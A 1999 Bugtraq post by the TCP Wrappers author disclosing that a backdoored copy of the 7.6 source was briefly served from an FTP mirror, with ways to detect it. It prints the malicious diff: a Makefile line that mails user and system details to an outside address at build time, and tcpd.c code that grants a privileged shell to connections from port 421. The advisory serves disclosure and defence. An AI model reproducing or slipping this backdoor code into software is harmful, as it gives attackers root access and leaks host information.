Home page logo
/

bugtraq logo Bugtraq mailing list archives

backdoored tcp wrapper source code
From: wietse () PORCUPINE ORG (Wietse Venema)
Date: Thu, 21 Jan 1999 11:38:17 -0500


TCP Wrappers is a widely-used security tool to protect UNIX systems
against intrusion. In has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
a backdoored version. Eventually this was bound to happen, and
that's why the source file is accompanied by a PGP signature.  But
that is no guarantee against people downloading and installing
backdoored software.

The backdoor gives access to a privileged shell when a client
connects from port 421.

The backdoored copy was downloaded 52 times between 07:16 MET and
16:29 MET. I have informed the sites that downloaded a copy.

Below are details on how to recognize the backdoored version.

        Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

    % ls -lcta
    -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
    ...
    dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .

Restored version:

    % ls -lt tcp_wrappers_7.6.tar.gz
    -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.
The signature of a compiled tcpd binary is:

    strings -a tcpd | grep csh

any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile        Mon Apr  7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
        @echo
        @echo "If none of these match your environment, edit the system"
        @echo "dependencies sections in the Makefile and do a 'make other'."
+       @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd () hotmail com'
        @echo

  #######################################################
***************
*** 649,655 ****
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options
  ############################
--- 650,656 ----
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! # KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options
  ############################
Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
  int     allow_severity = SEVERITY;    /* run-time adjustable */
  int     deny_severity = LOG_WARNING;  /* ditto */

+ char    IDENT[]="NC421\n";
+ char    SRUN[]="-csh";
+ char    SPATH[]="/bin/csh";
+ #define PORT 421
+
  main(argc, argv)
  int     argc;
  char  **argv;
  {
      struct request_info request;
+     struct sockaddr_in from;
      char    path[MAXPATHNAMELEN];
+     int     fromlen;
+
+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}

      /* Attempt to prevent the creation of world-writable files. */



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault